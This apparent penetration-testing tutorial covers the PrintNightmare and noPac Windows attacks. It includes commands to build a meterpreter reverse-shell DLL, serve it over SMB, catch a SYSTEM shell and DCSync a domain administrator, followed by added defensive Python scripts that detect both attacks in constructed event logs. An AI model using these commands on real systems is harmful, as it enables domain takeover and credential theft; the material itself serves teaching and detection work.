Known Vulnerabilities
PrintNightmare (CVE-2021-1675)
PrintNightmare is the nickname given to two vulnerabilities (CVE-2021-34527 and CVE-2021-1675) found in the Print Spooler service that runs on all Windows operating systems. Many exploits have been written based on these vulnerabilities that allow for privilege escalation and remote code execution.
Cloning the Exploit
git clone https://github.com/cube0x0/CVE-2021-1675.git
For this exploit to work successfully, we will need to use cube0x0's version of Impacket. We may need to uninstall the version of Impacket on our attack host and install cube0x0's:
pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install
Enumerating for MS-RPRN
We can use rpcdump.py to see if Print System Asynchronous Protocol and Print System Remote Protocol are exposed on the target.
rpcdump.py @IP | egrep 'MS-RPRN|MS-PAR'
After confirming this, we can proceed with attempting to use the exploit. We can begin by crafting a DLL payload using msfvenom.
Generating a DLL Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=XXXX -f dll > backupscript.dll
Creating a Share with smbserver.py
We will then host this payload in an SMB share we create on our attack host using smbserver.py.
sudo smbserver.py -smb2support CompData /path/to/payloadDll/
Configuring & Starting MSF multi/handler
Once the share is created and hosting our payload, we can use MSF to configure & start a multi handler responsible for catching the reverse shell that gets executed on the target.
msf> use exploit/multi/handler
Running the Exploit
With the share hosting our payload and our multi handler listening for a connection, we can attempt to run the exploit against the target. The command below is how we use the exploit:
Notice how at the end of the command, we include the path to the share hosting our payload (\\ShareName\nameofpayload.dll). If all goes well after running the exploit, the target will access the share and execute the payload. The payload will then call back to our multi handler giving us an elevated SYSTEM shell.
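From the defender's side, the step described above (the target's spooler fetching and loading a driver DLL from a remote share) is visible in the PrintService logs: event 316 in Microsoft-Windows-PrintService/Operational records a printer driver being added or updated and lists the driver files in its message, and event 808 in Microsoft-Windows-PrintService/Admin records the spooler failing to load a plug-in module. The script below is an added example, not code from the page or from the exploit repository. The sample events, the message wording, the host inventory and the host names are constructed; the list of non-driver system DLLs is a heuristic assumption. It also checks the inventory against the two standard mitigations: stopping the spooler on domain controllers and restricting driver installation to administrators.

```python
"""Defender-side triage for PrintNightmare: flag suspicious printer driver
installs in PrintService events and report hosts whose spooler posture should
change. All data below is constructed; the field layout is an assumption
about how a SIEM exports these events."""
import re

# Constructed sample events (not real telemetry). The message text is modelled
# on the Windows wording but written by hand here.
SAMPLE_EVENTS = [
    {"channel": "Microsoft-Windows-PrintService/Operational", "event_id": 316,
     "message": "Printer driver HP Universal Printing PCL 6 for Windows x64 Version-3 "
                "was added or updated. Files:- UNIDRV.DLL, hpcpp.dll. No user action is required."},
    {"channel": "Microsoft-Windows-PrintService/Operational", "event_id": 316,
     "message": "Printer driver 1234 for Windows x64 Version-3 was added or updated. "
                "Files:- UNIDRV.DLL, kernelbase.dll, \\\\SHAREHOST-PLACEHOLDER\\CompData\\backupscript.dll. "
                "No user action is required."},
    {"channel": "Microsoft-Windows-PrintService/Admin", "event_id": 808,
     "message": "The print spooler failed to load a plug-in module "
                "C:\\Windows\\system32\\spool\\DRIVERS\\x64\\3\\backupscript.dll, error code 0x45A."},
]

# Constructed host inventory (assumed shape): whether the spooler runs and
# whether the PointAndPrint RestrictDriverInstallationToAdministrators policy
# value is set.
SAMPLE_HOSTS = [
    {"name": "DC01", "role": "domain controller", "spooler_running": True, "restrict_driver_install_to_admins": False},
    {"name": "FILE01", "role": "member server", "spooler_running": True, "restrict_driver_install_to_admins": False},
    {"name": "WS01", "role": "workstation", "spooler_running": True, "restrict_driver_install_to_admins": True},
]

UNC_PATH = re.compile(r"^\\\\[^\\\s,]+\\[^\s,]+")
FILE_LIST = re.compile(r"Files:-\s*(.*?)(?:\.\s*No user action|$)")
# System libraries that are not printer driver components. Seeing one in a
# driver's file list is a heuristic indicator (assumption), not proof of compromise.
NON_DRIVER_SYSTEM_DLLS = {"kernelbase.dll", "kernel32.dll", "ntdll.dll"}


def driver_files(message):
    """Split the 'Files:-' list out of an event 316 message."""
    m = FILE_LIST.search(message)
    if not m:
        return []
    return [f.strip() for f in m.group(1).split(",") if f.strip()]


def triage(events):
    """Return (event_id, reason) findings a responder should review."""
    findings = []
    for ev in events:
        msg = ev["message"]
        if ev["event_id"] == 316 and "added or updated" in msg:
            for f in driver_files(msg):
                if UNC_PATH.match(f):
                    findings.append((316, f"driver file loaded from a UNC path: {f}"))
                elif f.lower() in NON_DRIVER_SYSTEM_DLLS:
                    findings.append((316, f"system DLL listed as a driver file: {f}"))
        elif ev["event_id"] == 808 and "failed to load a plug-in module" in msg:
            findings.append((808, "spooler failed to load a plug-in module; check the module path"))
    return findings


def spooler_posture(hosts):
    """Return (host, recommendation) pairs for hosts whose spooler exposure should change."""
    advice = []
    for h in hosts:
        if not h["spooler_running"]:
            continue
        if h["role"] == "domain controller":
            advice.append((h["name"], "stop and disable the Print Spooler service on domain controllers"))
        elif not h["restrict_driver_install_to_admins"]:
            advice.append((h["name"], "set RestrictDriverInstallationToAdministrators=1 (PointAndPrint policy)"))
    return advice


if __name__ == "__main__":
    for eid, why in triage(SAMPLE_EVENTS):
        print(f"event {eid}: {why}")
    for host, rec in spooler_posture(SAMPLE_HOSTS):
        print(f"{host}: {rec}")
```

Run against the constructed data, the benign HP driver event produces nothing, the second 316 event is flagged twice (system DLL in the file list and a UNC-sourced driver file), the 808 event is flagged once, and DC01 and FILE01 receive posture recommendations while WS01 does not.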
SamAccountName / noPac (CVE-2021-42287 / CVE-2021-42278)
This vulnerability encompasses two CVEs (CVE-2021-42278 and CVE-2021-42287), allowing for intra-domain privilege escalation from any standard domain user to Domain Admin level access in a single command.
This exploit path takes advantage of being able to change the SamAccountName of a computer account to that of a Domain Controller. By default, authenticated users can add up to ten computers to a domain. When doing so, we change the name of the new host to match a Domain Controller's SamAccountName. Once done, we request Kerberos tickets, causing the service to issue us tickets under the DC's name instead of the new name. When a TGS is requested, the ticket is issued for the closest matching name. Once done, we have access as that service and can even obtain a SYSTEM shell on a Domain Controller. The flow of the attack is outlined in detail in this blog post.
Cloning the NoPac Exploit Repo
git clone https://github.com/Ridter/noPac.git
Once Impacket is installed and we ensure the repo is cloned to our attack box, we can use the scripts in the noPac directory to check if the system is vulnerable using a scanner (scanner.py), then use the exploit (noPac.py) to gain a shell as NT AUTHORITY\SYSTEM.
Scanning for NoPac
We can use the scanner with a standard domain user account to attempt to obtain a TGT from the target Domain Controller. If successful, this indicates the system is, in fact, vulnerable. In some environments, an astute sysadmin may set the ms-DS-MachineAccountQuota value to 0. If this is the case, the attack will fail because our user will not have the rights to add a new machine account.
sudo python3 scanner.py domain/user:password -dc-ip <dc-ip> -use-ldap
Running NoPac & Getting a Shell
There are many different ways to use NoPac to further our access. One way is to obtain a shell with SYSTEM level privileges. We can do this by running noPac.py with the syntax below to impersonate the built-in administrator account and drop into a semi-interactive shell session on the target Domain Controller. This could be "noisy" or may be blocked by AV or EDR.
sudo python3 noPac.py domain/user:password -dc-ip <dc-ip> -dc-host <dc-hostname> -shell --impersonate administrator -use-ldap
Using noPac to DCSync the Built-in Administrator Account
We could then use the ccache file to perform a pass-the-ticket and perform further attacks such as DCSync. We can also use the tool with the -dump flag to perform a DCSync using secretsdump.py. This method would still create a ccache file on disk, which we would want to be aware of and clean up.
sudo python3 noPac.py domain/user:password -dc-ip <dc-ip> -dc-host <dc-hostname> --impersonate administrator -use-ldap -dump -just-dc-user domain/administrator
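The noPac flow described in this section creates a computer account (the MachineAccountQuota the scanner depends on), renames it to a Domain Controller's SamAccountName, requests tickets, and renames it back. Each of those directory changes lands in the Domain Controller's Security log: event 4741 (a computer account was created) and event 4781 (the name of an account was changed), which is what a defender monitors for this attack; setting ms-DS-MachineAccountQuota to 0, as mentioned above, removes the first step entirely. The script below is an added example, not code from the page or from the noPac repository. The event records, the user names, the DC inventory (DC01$, DC02$) and the privileged-user allow-list are constructed, and the field names are assumed to follow the EventData names of the XML event.

```python
"""Spot noPac-style sAMAccountName tampering in constructed Security events.
Constructed data only; field names are an assumption about the exported
EventData layout."""

# Constructed Windows Security event records (not real telemetry).
SAMPLE_EVENTS = [
    {"event_id": 4741, "SubjectUserName": "jdoe", "TargetUserName": "WIN-9Z1Q3K$"},
    {"event_id": 4781, "SubjectUserName": "jdoe", "OldTargetUserName": "WIN-9Z1Q3K$", "NewTargetUserName": "DC01"},
    {"event_id": 4781, "SubjectUserName": "jdoe", "OldTargetUserName": "DC01", "NewTargetUserName": "WIN-9Z1Q3K$"},
    {"event_id": 4781, "SubjectUserName": "hr-admin", "OldTargetUserName": "asmith", "NewTargetUserName": "a.smith"},
]

# Constructed inventory: sAMAccountNames of the domain controllers (assumed).
DC_ACCOUNTS = {"DC01$", "DC02$"}
# Constructed allow-list of principals expected to create computer accounts.
PRIVILEGED_USERS = {"Administrator"}


def is_machine_account(name):
    """Machine account sAMAccountNames carry a trailing '$'."""
    return name.endswith("$")


def detect_nopac(events, dc_accounts, privileged=PRIVILEGED_USERS):
    """Return findings as (severity, event_id, description) tuples."""
    dc_short = {d.rstrip("$").lower() for d in dc_accounts}
    findings = []
    for ev in events:
        eid = ev["event_id"]
        if eid == 4741 and ev["SubjectUserName"] not in privileged:
            # A non-privileged user consuming MachineAccountQuota: low on its own,
            # but it is the first step of the chain and worth correlating.
            findings.append(("info", 4741,
                             f"{ev['SubjectUserName']} created computer account {ev['TargetUserName']} (MachineAccountQuota in use)"))
        elif eid == 4781:
            old, new = ev["OldTargetUserName"], ev["NewTargetUserName"]
            if is_machine_account(old) and not is_machine_account(new):
                if new.lower() in dc_short:
                    findings.append(("critical", 4781,
                                     f"machine account {old} renamed to domain controller name {new}"))
                else:
                    findings.append(("high", 4781,
                                     f"machine account {old} renamed to non-machine name {new}"))
            elif not is_machine_account(old) and is_machine_account(new) and old.lower() in dc_short:
                # The rename back hides the impersonation window; flag it too.
                findings.append(("high", 4781,
                                 f"{old} renamed back to {new}: cleanup step after impersonation"))
    return findings


def by_subject(findings_with_events):
    """Group event subjects with their findings so one user's full chain is visible."""
    chains = {}
    for ev, finding in findings_with_events:
        chains.setdefault(ev["SubjectUserName"], []).append(finding)
    return chains


if __name__ == "__main__":
    results = detect_nopac(SAMPLE_EVENTS, DC_ACCOUNTS)
    for severity, eid, text in results:
        print(f"[{severity}] event {eid}: {text}")
```

On the constructed records the benign user rename (asmith to a.smith) produces nothing, while jdoe's three events yield an info, a critical and a high finding in sequence: the whole chain the page describes, attributed to one subject.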